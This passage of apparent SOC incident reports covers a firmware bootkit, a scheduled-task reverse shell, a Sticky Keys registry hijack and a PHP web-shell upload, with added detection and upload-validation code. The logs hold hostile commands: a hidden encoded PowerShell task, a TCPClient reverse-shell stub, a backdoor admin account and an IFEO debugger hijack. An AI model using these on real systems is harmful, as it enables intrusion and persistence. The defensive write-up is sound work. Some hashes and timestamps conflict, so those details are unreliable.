Similar to “BlackLotus” UEFI bootkit campaign
Requires physical access or admin privileges to install
Extremely sophisticated, nation-state level
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify HP Wolf alert | HP Wolf Security Console | Confirmed UEFI firmware compromise |
| 2. Physical Security | Investigate physical access | Travel logs, Security | CEO was in hotel; laptop unattended in room |
| 3. Device Quarantine | Isolate device (already bricked) | HP Sure Start | Device prevented from booting (safe) |
| 4. Forensic Analysis | Extract compromised firmware | HP Security Team | Firmware contains BlackLotus bootkit |
| 5. Replacement | Replace laptop | IT Hardware Team | New laptop provisioned with clean firmware |
| 6. Credential Rotation | Rotate CEO’s credentials | Azure AD, Okta | All passwords reset; MFA re-enrolled |
Jira Incident Report
**Ticket:** SOC-2024-092
**Summary:** T1542 – UEFI Firmware Compromise (BlackLotus Bootkit)
**Status:** RESOLVED
**Resolution:** MALICIOUS – Device Bricked and Replaced
**Priority:** P1 – CRITICAL
**Labels:** T1542, pre-os-boot, uefi, firmware, bootkit, hp-wolf, executive
**Components:** Hardware-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: HP Wolf Security (Hardware-Enforced Security).
Alert: “UEFI Firmware Integrity Check Failed”.
Host: EXEC-WS-001 (CEO’s Laptop).
User: cjohnson (CEO).
Time: 2024-02-18 14:30 EST.
Technique: MITRE ATT&CK T1542.001 – Pre-OS Boot: System Firmware.
2. Technical Analysis:
Attack Chain:
2024-02-17, 19:00 – CEO checks into hotel, leaves laptop in room
19:00-19:30 – Unknown individual gains physical access to room
19:15 – Attacker boots from USB with firmware flashing tool
19:20 – Malicious UEFI firmware flashed (BlackLotus bootkit)
19:25 – Attacker leaves, laptop appears normal
2024-02-18, 08:00 – CEO uses laptop normally (bootkit active)
14:25 – CEO reboots laptop after update
14:25 – HP Sure Start detects firmware hash mismatch
14:25 – Boot blocked; system bricked (protection)
14:30 – HP Wolf Security alerts SOC
Bootkit Analysis:
Name: BlackLotus UEFI Bootkit
Installation: Requires physical access or admin privileges
Persistence: Survives OS reinstallation, disk replacement
Capabilities:
Disables Secure Boot
Injects into Windows boot process
Loads before EDR/AV
Can re-infect OS even after clean install
Establishes C2 early in boot process
Impact:
Bootkit active for approximately 6 hours
No C2 communication observed (firewall logs)
No data exfiltration detected
Device bricked before further compromise
3. Investigation Findings:
Timeline:
02-17 19:00 – Laptop unattended in hotel
02-17 19:15 – Firmware flashed (estimated)
02-18 08:00-14:00 – Normal use (bootkit active)
02-18 14:25 – Reboot triggers HP detection
02-18 14:25 – Device bricked (protection)
02-18 14:30 – Alert triggers
02-18 14:35 – SOC investigates
02-18 15:00 – Replacement laptop provisioned
Indicators of Compromise (IoCs):
Firmware:
– Compromised UEFI hash: a1b2c3d4…
– Malicious driver: BootkitDriver.efi
Physical:
– Hotel: Marriott Downtown, Room 1247
– Time window: 02-17 19:00-19:30
4. Containment Actions:
Immediate Actions:
Device already bricked (safe state).
Isolated from network (already off).
CEO credentials rotated.
Hotel security notified.
Device Replacement:
New laptop provisioned with verified clean firmware.
BIOS password enabled.
HP Sure Start enabled and configured.
Physical Security:
CEO briefed on physical security risks.
Company policy updated: never leave devices unattended in hotels.
GPS tracking enabled on executive devices.
5. Root Cause Analysis:
Primary Cause: Physical access to unattended device in hotel.
Contributing Factors:
No BIOS password on device.
Device left unattended.
Sophisticated attacker with UEFI flashing capability.
6. Business Impact:
Operational Impact: CEO offline for 1 hour (laptop replacement).
Data Exposure: None (device bricked before exfiltration).
Reputational Impact: Internal only.
Financial Impact: Cost of laptop replacement.
7. Remediation & Prevention:
Completed Actions:
Compromised device bricked and replaced.
CEO credentials rotated.
Physical security briefing conducted.
Technical Controls Enhanced:
BIOS password enforced on all executive devices.
HP Sure Start enabled with strict enforcement.
Physical tracking enabled on all laptops.
Policy updated: devices must be secured or with user at all times.
8. Conclusion:
The CEO’s laptop was physically compromised in a hotel room, with an attacker installing a BlackLotus UEFI bootkit via firmware flashing. HP Wolf Security detected the firmware modification on next boot and bricked the device, preventing further compromise. No data was exfiltrated.
Closure Rationale: Device replaced; credentials rotated; physical security enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-18 16:00 EST
53. T1053.005 – Scheduled Task (Splunk Detection)
Splunk Alert Details
**Alert ID:** SPLUNK-SCHTASK-1053-7842
**Alert Time:** 2024-02-18 11:30:45 EST
**Severity:** HIGH (82/100)
**Source:** Splunk Enterprise Security
**Rule:** “Scheduled Task Created with SYSTEM Privileges”
**MITRE ATT&CK:** T1053.005 – Scheduled Task
Alert Details:
Correlated Events:
Windows Event ID 4698 (Scheduled Task Created):
Time: 11:25 EST
Host: HR-WS-045 (HR Department)
User: SYSTEM
Task Name: “WindowsUpdateTask”
Task XML:
Event ID 4688 (Process Creation):
Time: 11:26 EST
Process: schtasks.exe
Command: schtasks /create /tn "WindowsUpdateTask" /tr "powershell -WindowStyle Hidden -Enc JABjAGwAaQ…" /ru SYSTEM /sc HOURLY
Network Connection:
Time: 11:30 EST
Process: powershell.exe
Destination: 192.168.34.56:443
Detection Logic:
Task created with SYSTEM privileges
Name mimics Windows Update
Encoded PowerShell command (reverse shell)
Created by suspicious process (not legitimate Windows Update)
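The detection logic above, worked into a triage routine as an added example (not code from the report or from Splunk): it reads Event ID 4698 records, decodes the `-Enc` argument, and flags a task only when it runs as SYSTEM and shows at least one other listed trait. The event records, the TaskContent XML and the `$client = …` plaintext are constructed for the example; the plaintext is chosen so its encoded form starts with the same `JABjAGwAaQ` prefix the alert shows.

```python
"""Added example, not code from the report: triage Windows Event ID 4698
(scheduled task created) records against the detection logic listed above,
including decoding the -Enc argument. Events and task XML are constructed."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
LOOKALIKE = re.compile(r"windows\s*update|microsoft\s*update", re.I)
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
NET_OR_EVAL = ("tcpclient", "getstream", "downloadstring", "invoke-expression", "iex ")


def decode_encoded_powershell(arguments):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_ARG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def task_reasons(task_name, task_content):
    """List the suspicious traits of one task definition (empty list = nothing notable)."""
    root = ET.fromstring(task_content)
    reasons = []
    user_id = root.findtext(".//t:Principals/t:Principal/t:UserId", default="", namespaces=TASK_NS)
    if user_id.upper() in SYSTEM_IDS:
        reasons.append("runs as SYSTEM")
    if LOOKALIKE.search(task_name) and not task_name.startswith("\\Microsoft\\Windows\\"):
        reasons.append("name mimics Windows Update outside the \\Microsoft\\Windows\\ folder")
    for action in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS).lower()
        args = action.findtext("t:Arguments", default="", namespaces=TASK_NS)
        if "powershell" not in command:
            continue
        if "-windowstyle hidden" in args.lower():
            reasons.append("hidden PowerShell window")
        decoded = decode_encoded_powershell(args)
        if decoded is not None:
            reasons.append("encoded PowerShell action")
            if any(tok in decoded.lower() for tok in NET_OR_EVAL):
                reasons.append("decoded command uses network or eval primitives")
    return reasons


def is_suspicious(reasons):
    """SYSTEM alone is normal for built-in tasks; SYSTEM plus any other trait is not."""
    return "runs as SYSTEM" in reasons and len(reasons) > 1


def triage_events(events):
    """Return {task name: reasons} for every 4698 event that looks malicious."""
    flagged = {}
    for ev in events:
        if ev.get("EventID") != 4698:
            continue
        reasons = task_reasons(ev["TaskName"], ev["TaskContent"])
        if is_suspicious(reasons):
            flagged[ev["TaskName"]] = reasons
    return flagged


def build_task_content(user_id, command, arguments):
    """Constructed stand-in for the TaskContent XML carried in a 4698 event."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        "<Triggers><TimeTrigger><Repetition><Interval>PT1H</Interval></Repetition>"
        "<Enabled>true</Enabled></TimeTrigger></Triggers>"
        f'<Principals><Principal id="Author"><UserId>{escape(user_id)}</UserId>'
        "<RunLevel>HighestAvailable</RunLevel></Principal></Principals>"
        f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
        f"<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>"
    )


# Constructed plaintext: the report's encoded command starts with "JABjAGwAaQ", the
# base64 of UTF-16LE "$cli", so a "$client = ..." stub reproduces that prefix.
SAMPLE_PLAINTEXT = "$client = New-Object System.Net.Sockets.TCPClient('192.168.34.56', 443)"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed 4698 records: one malicious, one built-in
    {"EventID": 4698, "Host": "HR-WS-045", "TaskName": "WindowsUpdateTask",
     "TaskContent": build_task_content(
         "S-1-5-18", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
         f"-WindowStyle Hidden -Enc {SAMPLE_ENCODED}")},
    {"EventID": 4698, "Host": "HR-WS-045",
     "TaskName": "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start",
     "TaskContent": build_task_content(
         "S-1-5-18", "C:\\Windows\\System32\\sc.exe", "start wuauserv")},
]

if __name__ == "__main__":
    for name, reasons in triage_events(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```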
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed malicious scheduled task creation |
| 2. Command Decoding | Decode PowerShell command | PowerShell, CyberChef | Reverse shell to 192.168.34.56:443 |
| 3. Immediate Action | Disable and delete task | schtasks /delete | Task removed |
| 4. Process Investigation | Find source of task creation | CrowdStrike | PowerShell from compromised user account |
| 5. User Remediation | Reset affected user password | Azure AD, AD | Password reset; MFA enforced |
| 6. Threat Hunting | Check for similar tasks | Splunk, CrowdStrike | No other tasks found |
Jira Incident Report
**Ticket:** SOC-2024-093
**Summary:** T1053.005 – Scheduled Task Persistence with Reverse Shell
**Status:** RESOLVED
**Resolution:** MALICIOUS – Task Removed
**Priority:** P2 – MEDIUM
**Labels:** T1053, scheduled-task, persistence, splunk, reverse-shell
**Components:** Endpoint-Security, Persistence
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Scheduled Task Created with SYSTEM Privileges”.
Host: HR-WS-045 (HR Department).
Task: “WindowsUpdateTask” (malicious).
Time: 2024-02-18 11:30 EST.
Technique: MITRE ATT&CK T1053.005 – Scheduled Task.
2. Technical Analysis:
Attack Chain:
11:15 – User opens phishing email with malicious link
11:16 – PowerShell downloads and executes payload
11:18 – Payload enumerates system, finds user has admin rights
11:20 – PowerShell creates scheduled task with SYSTEM privileges
11:25 – Task creation logged
11:26 – schtasks command executed
11:30 – First task trigger (hourly)
11:30 – Reverse shell connects to 192.168.34.56:443
11:30 – Splunk alert triggers
Scheduled Task Details:
Name: WindowsUpdateTask (masquerading)
Trigger: Hourly (persistence)
Run As: SYSTEM (highest privileges)
Action: PowerShell encoded reverse shell
Reverse Shell Analysis:
Decoded command: reverse shell to 192.168.34.56:443
Interactive PowerShell session
C2 IP: 192.168.34.56 (internal – compromised engineering host)
User Account:
User had local admin rights (should be standard user)
Account used to create SYSTEM task
3. Investigation Findings:
Timeline:
11:15 – Phishing email opened
11:20-11:26 – Task created
11:30 – First execution, C2 connection
11:30 – Alert triggers
11:32 – SOC investigates
11:35 – Task deleted
Indicators of Compromise (IoCs):
Task:
– Name: WindowsUpdateTask
– Action: powershell -WindowStyle Hidden -Enc JABjAGwAaQ…
Network:
– C2: 192.168.34.56:443
User:
– HR user with admin rights (excessive)
4. Containment Actions:
Immediate Actions:
Deleted scheduled task via schtasks /delete.
Terminated reverse shell process.
Isolated host temporarily.
Blocked C2 IP at firewall.
User Remediation:
Removed user’s admin rights.
Reset password.
Phishing training assigned.
Host Remediation:
Full scan (no other malware).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User with admin rights clicked phishing link.
Contributing Factors:
User had excessive privileges (local admin).
No application control blocking PowerShell.
No alerting on scheduled task creation.
6. Business Impact:
Operational Impact: HR workstation offline for 1 hour.
Data Exposure: None (C2 internal, no data sent).
7. Remediation & Prevention:
Completed Actions:
Task deleted.
User admin rights removed.
C2 blocked.
Technical Controls Enhanced:
Removed admin rights from all standard users.
Created alert for any scheduled task creation.
Enhanced PowerShell logging.
8. Conclusion:
A user with admin rights clicked a phishing link, leading to the creation of a scheduled task with SYSTEM privileges running a reverse shell hourly. Splunk detected the task creation, enabling rapid removal before significant C2 activity.
Closure Rationale: Task removed; user privileges reduced; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-18 12:30 EST
54. T1015 – Accessibility Features (Sysmon Detection)
Sysmon Alert Details
**Alert ID:** SYSMON-ACCESSIBILITY-1015-7842
**Alert Time:** 2024-02-18 15:30:15 EST
**Severity:** HIGH (88/100)
**Source:** Sysmon (Event ID 1 – Process Creation)
**Rule:** “Sethc.exe (Sticky Keys) Process Creation – Potential Persistence”
**MITRE ATT&CK:** T1015 – Accessibility Features
Alert Details:
**Event ID:** 1 (Process Creation)
**Time:** 15:25 EST
**Host:** SEC-WS-023 (Security Team Workstation)
**User:** SYSTEM (via Winlogon)
Process Tree:
winlogon.exe (PID: 568 – SYSTEM)
sethc.exe (PID: 7842 – SYSTEM)
Command: C:\Windows\System32\cmd.exe (PID: 7845)
Command: whoami (confirmed SYSTEM)
Command: net user attacker Password123! /add
Command: net localgroup administrators attacker /add
Registry Artifacts (Sysmon Event 13):
Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
Value: Debugger
Data: C:\Windows\System32\cmd.exe
Modified: 15:20 EST
Modified By: powershell.exe (PID: 4789)
Detection Logic:
sethc.exe (Sticky Keys) normally runs when Shift key pressed 5 times
Registry configured to launch cmd.exe instead (Debugger trick)
Pressing Shift 5 times now launches SYSTEM command prompt
Classic persistence technique for physical access
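The two Sysmon signals in this alert, the IFEO `Debugger` write (Event ID 13) and the SYSTEM shell that follows (Event ID 1), as an added triage example that is not code from the report. It generalizes from sethc.exe to the other accessibility binaries the same trick applies to, and also catches the form in which winlogon.exe launches the "debugger" directly with the hijacked binary's path on its command line. All events below are constructed.

```python
"""Added example, not code from the report: triage constructed Sysmon events for
accessibility-feature (Sticky Keys style) persistence. Two checks: an IFEO
"Debugger" value set for an accessibility binary (Event ID 13), and a shell
launched by, or in place of, such a binary (Event ID 1)."""
import ntpath
import re

ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
IFEO_DEBUGGER = re.compile(r"\\Image File Execution Options\\([^\\]+)\\Debugger$", re.I)


def basename(path):
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()


def check_registry_event(ev):
    """Event ID 13 (SetValue): IFEO Debugger pointed at an accessibility binary."""
    if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
        return None
    m = IFEO_DEBUGGER.search(ev.get("TargetObject", ""))
    if not m or m.group(1).lower() not in ACCESSIBILITY_BINARIES:
        return None  # legitimate debuggers (e.g. JIT debuggers) target other images
    return (f"IFEO Debugger set for {m.group(1)} -> {ev.get('Details')} "
            f"by {basename(ev.get('Image', ''))}")


def check_process_event(ev):
    """Event ID 1 (ProcessCreate): shell spawned by, or in place of, an accessibility binary."""
    if ev.get("EventID") != 1:
        return None
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    if image not in SHELLS:
        return None
    if parent in ACCESSIBILITY_BINARIES:
        return f"{image} spawned by {parent}"
    # IFEO form: winlogon starts the "debugger" with the hijacked binary as its argument
    cmdline = ev.get("CommandLine", "").lower()
    if parent == "winlogon.exe" and any(b in cmdline for b in ACCESSIBILITY_BINARIES):
        return f"{image} launched by winlogon.exe as IFEO debugger for an accessibility binary"
    return None


def triage_sysmon(events):
    """Return [(UtcTime, finding)] for every event that matches a check."""
    findings = []
    for ev in events:
        for check in (check_registry_event, check_process_event):
            hit = check(ev)
            if hit:
                findings.append((ev.get("UtcTime"), hit))
    return findings


SAMPLE_EVENTS = [  # constructed; mirrors the alert's registry write and process tree
    {"EventID": 13, "UtcTime": "2024-02-18 20:20:01", "EventType": "SetValue",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "Details": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 13, "UtcTime": "2024-02-18 20:21:15", "EventType": "SetValue",  # benign JIT debugger
     "Image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myapp.exe\Debugger",
     "Details": r'"C:\Windows\System32\vsjitdebugger.exe" -p %ld -e %ld'},
    {"EventID": 1, "UtcTime": "2024-02-18 21:25:03", "User": "NT AUTHORITY\\SYSTEM",  # normal sethc start
     "Image": r"C:\Windows\System32\sethc.exe", "ParentImage": r"C:\Windows\System32\winlogon.exe",
     "CommandLine": r"C:\Windows\System32\sethc.exe 211"},
    {"EventID": 1, "UtcTime": "2024-02-18 21:25:04", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\sethc.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "UtcTime": "2024-02-18 21:25:04", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\winlogon.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe 211"},
    {"EventID": 1, "UtcTime": "2024-02-18 21:30:00", "User": "COMPANY\\jdoe",  # ordinary user shell
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for when, finding in triage_sysmon(SAMPLE_EVENTS):
        print(when, finding)
```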
Additional Context:
User was at desk, accidentally pressed Shift key 5 times
Unexpected command prompt appeared
User reported immediately to security
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed accessibility feature abuse |
| 2. Registry Remediation | Remove Debugger registry key | reg delete | Debugger key removed |
| 3. User Account Check | Check for unauthorized accounts | AD Users and Computers | Attacker account found and disabled |
| 4. Account Remediation | Delete attacker account | net user | Attacker account deleted |
| 5. User Interview | Contact user | Teams, Phone | User reported the accidental Shift key presses and assisted the investigation |
| 6. Threat Hunting | Check other hosts for same registry | Splunk, Sysmon | No other occurrences found |
Jira Incident Report
**Ticket:** SOC-2024-094
**Summary:** T1015 – Sticky Keys Accessibility Feature Abuse for Persistence
**Status:** RESOLVED
**Resolution:** MALICIOUS – Registry Key Removed
**Priority:** P2 – MEDIUM
**Labels:** T1015, accessibility-features, sticky-keys, persistence, sysmon
**Components:** Endpoint-Security, Persistence
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “Sethc.exe (Sticky Keys) Process Creation – Potential Persistence”.
Host: SEC-WS-023 (Security Team Workstation).
User: SYSTEM (via winlogon).
Time: 2024-02-18 15:30 EST.
Technique: MITRE ATT&CK T1015 – Accessibility Features.
2. Technical Analysis:
Attack Chain:
14:00 – Attacker gains remote access via compromised credentials
14:15 – Attacker runs PowerShell to modify registry
14:20 – Registry key modified: sethc.exe debugger set to cmd.exe
14:20 – Attacker account “attacker” created
14:20 – Attacker added to local administrators group
14:20-15:25 – Attacker idle (waiting)
15:25 – User accidentally presses Shift key 5 times
15:25 – cmd.exe launches as SYSTEM
15:25 – User sees command prompt, reports immediately
15:30 – Sysmon alerts
Persistence Mechanism:
Accessibility Feature: Sticky Keys (sethc.exe)
Registry Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
Value: Debugger
Data: C:\Windows\System32\cmd.exe
Effect: Pressing Shift 5 times launches SYSTEM command prompt
Attacker Account:
Username: attacker
Password: (complex, known to attacker)
Privileges: Local administrator
Status: Created 15:20, not used yet
User Discovery:
User pressed Shift keys accidentally while typing
Unexpected SYSTEM command prompt appeared
User reported immediately to security (excellent response)
3. Investigation Findings:
Timeline:
14:20 – Registry modified, account created
15:25 – User triggers accessibility feature
15:25 – User reports incident
15:30 – Sysmon alert
15:32 – SOC investigates
15:35 – Registry key removed
15:36 – Attacker account deleted
Indicators of Compromise (IoCs):
Registry:
– HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = “C:\Windows\System32\cmd.exe”
Account:
– attacker (local admin)
Process:
– sethc.exe spawning cmd.exe
4. Containment Actions:
Immediate Actions:
Removed Debugger registry key.
Deleted attacker account.
Scanned host for other persistence (none).
Verified no other registry modifications.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
User commended for reporting.
User educated on physical security.
5. Root Cause Analysis:
Primary Cause: Attacker gained remote access and modified registry for persistence.
Contributing Factors:
Compromised credentials allowed remote access.
No monitoring for accessibility feature abuse.
Classic persistence technique not blocked.
6. Business Impact:
Operational Impact: Security workstation offline for 1 hour.
Security Impact: Attacker had local admin access for 1 hour.
Data Exposure: None (attacker idle, no activity).
7. Remediation & Prevention:
Completed Actions:
Registry key removed.
Attacker account deleted.
Host secured.
Technical Controls Enhanced:
Created alert for any Image File Execution Options modifications.
Blocked remote registry modifications via GPO.
Enforced application whitelisting.
8. Conclusion:
An attacker used remote access to modify the registry, enabling the Sticky Keys accessibility feature to launch a SYSTEM command prompt. The user accidentally triggered the feature and reported immediately. Sysmon detected the anomalous process creation, enabling rapid remediation. No further compromise occurred.
Closure Rationale: Registry key removed; attacker account deleted; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-18 16:30 EST
55. T1505 – Server Software Component (Imperva Detection)
Imperva Alert Details
**Alert ID:** IMPERVA-WEB-SHELL-1505-7842
**Alert Time:** 2024-02-18 10:30:22 EST
**Severity:** CRITICAL (95/100)
**Source:** Imperva Web Application Firewall + RASP
**Rule:** “Web Shell Detected on Server”
**MITRE ATT&CK:** T1505.003 – Server Software Component: Web Shell
Alert Details:
Detection: Malicious file uploaded to web server – PHP web shell
**Server:** WEB-SRV-045 (Public-Facing Web Server)
**Application:** Company Portal (PHP)
**Time:** 10:25 EST
File Details:
Path: /var/www/html/uploads/images.php
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Size: 2.3 KB
Upload Time: 10:23 EST
Uploaded Via: HTTP POST to /uploads/upload.php
Source IP: 185.143.221[.]89 (Bulgaria)
Web Shell Analysis:
File Type: PHP web shell (“WSO” – Web Shell by oRb)
Capabilities:
Execute system commands
Upload/download files
Browse file system
Database queries
Reverse shell
Obfuscated: Base64 encoded functions
Password Protected: “attacker123”
Access Logs:
10:24 EST – GET /uploads/images.php?action=cmd&cmd=whoami
Result: www-data
10:24 EST – GET /uploads/images.php?action=cmd&cmd=id
Result: uid=33(www-data) gid=33(www-data)
10:25 EST – GET /uploads/images.php?action=cmd&cmd=uname -a
Result: Linux web-server 5.4.0
10:25 EST – Imperva detects and blocks
Additional Context:
File upload functionality intended for images only
No validation on file type (vulnerability)
Web server accessed from Bulgaria (unusual)
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Imperva alert | Imperva Console | Confirmed web shell upload and access |
| 2. Immediate Action | Remove web shell | SSH, File System | images.php deleted |
| 3. Block IP | Block attacker IP | Imperva WAF, Firewall | IP 185.143.221[.]89 blocked |
| 4. Vulnerability Assessment | Identify upload vulnerability | Code Review, Scanner | File upload allowed PHP files; patched |
| 5. Log Review | Check for data access | Web Logs, Database Logs | No database access; file system browsed |
| 6. Credential Rotation | Rotate any exposed credentials | DevOps Team | Database credentials rotated |
Jira Incident Report
**Ticket:** SOC-2024-095
**Summary:** T1505 – PHP Web Shell Uploaded to Public Web Server
**Status:** RESOLVED
**Resolution:** MALICIOUS – Web Shell Removed
**Priority:** P1 – CRITICAL
**Labels:** T1505, web-shell, server-component, imperva, php
**Components:** Web-Security, Server-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Imperva Web Application Firewall + RASP.
Alert: “Web Shell Detected on Server”.
Server: WEB-SRV-045 (Public-Facing Web Server).
File: /var/www/html/uploads/images.php (WSO web shell).
Time: 2024-02-18 10:30 EST.
Technique: MITRE ATT&CK T1505.003 – Server Software Component: Web Shell.
2. Technical Analysis:
Attack Chain:
10:20 – Attacker scans for vulnerable file upload endpoints
10:21 – Discovers /uploads/upload.php (no file type validation)
10:22 – Attacker crafts PHP web shell named images.php
10:23 – Uploads images.php via HTTP POST
10:23 – File saved to /var/www/html/uploads/images.php
10:24 – Attacker accesses web shell, runs reconnaissance commands
10:24 – whoami, id, uname -a executed
10:25 – Imperva detects web shell signature
10:25 – Imperva blocks further access
Web Shell Analysis:
Type: WSO (Web Shell by oRb) – popular PHP web shell
Password: “attacker123” (required for access)
Capabilities:
Command execution (via system, shell_exec)
File upload/download
File system navigation
Database queries
Reverse shell creation
Obfuscation: Base64 encoded functions to evade detection
Attacker Activity:
Reconnaissance only (3 commands)
No file downloads
No database access
No persistence installed
Vulnerability:
File upload script allowed PHP files
No file type validation
No authentication on upload endpoint
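The validation the patched upload handler needed (extension whitelist, image-only content, no double extensions, server-chosen filename), as an added example in Python rather than the portal's own PHP; the sample files and the `validate_upload` / `verdict` helpers are constructed for illustration and are not the project's code.

```python
"""Added example, not code from the report: a defensive upload validator of the
kind upload.php lacked. Checks the client name, the declared extension, the
file's magic bytes and embedded script markers, then returns a server-generated
name so the client never controls where or as what the file is stored."""
import os
import re
import uuid

ALLOWED = {  # extension -> accepted magic-byte prefixes
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")  # exactly one extension
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename, content):
    """Return the server-side filename to store under, or raise UploadRejected."""
    name = os.path.basename(client_filename.replace("\\", "/"))  # drop any path component
    if not SAFE_NAME.match(name):
        raise UploadRejected("filename must be name.ext with a single extension")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not content or len(content) > MAX_BYTES:
        raise UploadRejected("empty or oversized file")
    if not any(content.startswith(sig) for sig in ALLOWED[ext]):
        raise UploadRejected("content does not match the declared image type")
    if any(marker in content.lower() for marker in SCRIPT_MARKERS):
        raise UploadRejected("script markers embedded in image data")
    return f"{uuid.uuid4().hex}.{ext}"  # client name is never reused on disk


def verdict(client_filename, content):
    """String summary used by the samples below and by callers that only want a decision."""
    try:
        validate_upload(client_filename, content)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"


# Constructed sample files (no real shell; the PHP stubs are inert comments)
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
PHP_SAMPLE = b"<?php /* constructed stand-in for a web shell */ ?>"
JPEG_WITH_PHP = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 16 + b"<?php /* marker */ ?>"

SAMPLES = [
    ("photo.PNG", PNG_SAMPLE),               # legitimate image, case-insensitive extension
    ("images.php", PHP_SAMPLE),              # the report's web shell name
    ("images.php.jpg", PNG_SAMPLE),          # double extension
    ("images.jpg", PHP_SAMPLE),              # wrong content for declared type
    ("images.jpg", JPEG_WITH_PHP),           # valid JPEG header carrying PHP
    ("../../var/www/html/x.png", PNG_SAMPLE),  # path component is stripped
]


def run_samples():
    """Return [(client filename, verdict)] for the constructed samples."""
    return [(name, verdict(name, data)) for name, data in SAMPLES]


if __name__ == "__main__":
    for name, result in run_samples():
        print(f"{name:28} {result}")
```

The validator assumes the endpoint already authenticates the caller; the stored file should also live outside the web root or in a directory where the server does not execute scripts, since validation alone is not a substitute for that.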
3. Investigation Findings:
Timeline:
10:23 – Web shell uploaded
10:24 – Attacker reconnaissance
10:25 – Imperva detects and blocks
10:26 – Web shell removed
10:30 – Alert triggers
Indicators of Compromise (IoCs):
Files:
– /var/www/html/uploads/images.php (SHA256: a1b2c3d4…)
Network:
– Attacker IP: 185.143.221[.]89
– URLs:
– POST /uploads/upload.php
– GET /uploads/images.php?action=cmd&cmd=whoami
4. Containment Actions:
Immediate Actions:
Deleted images.php from server.
Blocked attacker IP at WAF and firewall.
Verified no other web shells present.
Vulnerability Remediation:
Patched upload.php to validate file types (images only).
Implemented file extension whitelist.
Added authentication to upload endpoint.
Credential Rotation:
Rotated database credentials (as precaution).
Rotated any service account passwords.
5. Root Cause Analysis:
